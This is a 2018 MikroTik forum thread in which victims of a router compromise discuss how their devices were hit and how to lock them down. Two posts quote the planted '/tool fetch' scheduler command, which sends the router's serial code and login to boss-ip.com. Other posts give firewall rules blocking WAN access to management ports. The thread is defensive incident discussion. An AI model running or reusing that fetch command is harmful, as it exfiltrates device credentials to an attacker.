bug persists after updating to 6.42.3

0ldman · June 15, 2018, 11:13pm

We had issues with the src address lists in the firewall letting through all traffic rather than only the traffic listed, so of course they blew right through a non-functional firewall.

They put two scripts in there, one was enabling ppoe out, the other was this.

{/tool fetch url=("http://www.boss-ip.com/Core/Update.ashx\?key=7da1df40bdee0309&action=upload&sncode=BDDC61FCE64D0922DD64998709BB639A&dynamic=static&user=myusername&pwd=mypassword")}

When you go to this site it tries to infect your system right off. Looks like they’re trying to get a bunch of infected machines mining coins for them. Not sure what their intent is with Mikrotik hardware.

anav · June 15, 2018, 11:38pm

WIthout confirmation that you are following stated directions…
a. you are using latest OS
b. have closed down the router from external access.

Then one can expect to be hacked unfortunately.

zimzum · June 16, 2018, 9:00am

I have the same problem with two mikrotiks. Both have the last firmware and router os version from two weeks.

msatter · June 16, 2018, 9:19am

http://forum.mikrotik.com/t/s-o-s-new-vurnelabilty-on-6-42-3-no/120528/1

gordon65 · June 16, 2018, 4:12pm

Hello,

here are some more information about the changes that have been made:

i immediately updated my version. I can’t tell which version I had before

Scripts:

{/tool fetch url=("http://www.boss-ip.com/Core/Update.ashx\?key=bdee03097da1df40&action=upload&sncode=17E88147941B12F2E415872A518FBD9F&dynamic=static")}

ppp profilePNG.PNG

0ldman · June 16, 2018, 7:22pm

I’m very aware of those.

What I’m talking about is how we got hit with one.

Address lists are being ignored in the filter section of the firewall randomly.

We noticed it around 6.30 and it randomly pops up ever since. I had my DNS blocked to all but allowed address list of “DNS”. When I updated to 6.30 I had to change all of my rules as the DNS address list was ignored. The same was happening with my port 80 and winbox rules, only in reverse. Instead of only allowing my addresses it allowed all addresses and I didn’t catch it until we had already been hacked.

What I’m talking about is a system that was locked down to only allowed addresses through firewall filter rules. The address lists were ignored.

leopiri · June 17, 2018, 9:44pm

I had the same problem, winbox port blocked only for network provider, latest version and firmware, strong users and passwords, I noticed this on June 15 at 10pm.

R1CH · June 18, 2018, 4:54pm

If you didn’t change passwords after upgrading to fix the winbox exploit, this is likely how they are gaining access. Change all passwords, preferably after netinstall to ensure no remaining backdoors.

katem07 · June 18, 2018, 9:35pm

Secure u’r Firewall by this rules , Modify in-interface as your’s wan label

/ip firewall filter
add action=passthrough chain=unused-hs-chain comment=\
    "###### Access Protection Start" disabled=yes
add action=add-src-to-address-list address-list=Hacker address-list-timeout=0s \
    chain=input comment="Add External Access Tries" dst-port=\
    21,22,23,80,443,8291,8728,8729 in-interface=WAN log=yes log-prefix=\
    "Security System <>" protocol=tcp
add action=drop chain=input comment="Block External Access to Ports" dst-port=\
    21,22,23,80,443,8291,8728,8729 in-interface=WAN protocol=tcp \
add action=drop chain=input comment="Block External Access to DNS" dst-port=53 \
    in-interface=WAN protocol=tcp
add action=drop chain=input comment="Block External Access to DNS" dst-port=53 \
    in-interface=WAN protocol=udp
add action=passthrough chain=unused-hs-chain comment=\
    "###### Access Protection End" disabled=yes

By the way , i tracked the hackers MAC-ADDRESS and i found this result : E4:8D:8C:3A:E5:96 .. which it belongs to RouterBoard.Com !

florid · June 19, 2018, 1:29am

That’s your WAN interface MAC address.

katem07 · June 19, 2018, 8:28am

How did u know that !

No buddy i have checked all my ether(s) and bridges Mac Addresses , that’s not one of it

Modestas · June 19, 2018, 12:17pm

I really wonder how you have pulled MAC address from remote server RouterBoard.Com

What about your ISP gateway MAC address?

As side note, F5 blog https://www.f5.com/labs/articles/threat-intelligence/russian-attacks-against-singapore-spike-during-trump-kim-summit says there was attack on Jun 11 targeting some known vulnerabilities and Mikrotik’s port 8291 was not forgotten. See Fig 3 for attack destination country stats.

katem07 · June 20, 2018, 10:02am

By Firewall Filter i did Log for the attacker src address , so when he attacks my host , Mikrotik Server logs his Src address and (a) src Mac-Address
The src mac address logged in my Server log not belong’s to me , That’s all buddy

I really wondering about possibility to be my ISP wan .. so i didn’t say that it’s attacker MAC , i just said it’s belong to RouterBoard.com
But i’m sure that it’s not my WAN interface MAC address

i checked out F5 Blog , and i found the same ip subnet of the attacker bottled in my dynamic address list

188.246.234.62 | in my dynamic address list
188.246.234.60 | in F5 article
Maybe they did it because of the Turkish elections cause My ISP Provider is Turktelecom

Also i attached all attackers ip-address who attacked my nine servers if u wanna block it in advance
Regard’s
Attacker’s SRC.txt (26.8 KB)

tippenring · June 20, 2018, 1:59pm

MAC addresses work only at the broadcast domain level (layer 2). No MAC address is ever routed to another subnet. The MAC addresses on a frame are always updated by routers. So no, you do not have the MAC of your attacker. You have the MAC of the device in the broadcast domain that sent you the packet.

katem07 · June 21, 2018, 9:26am

It’s really a valuable information , txn man .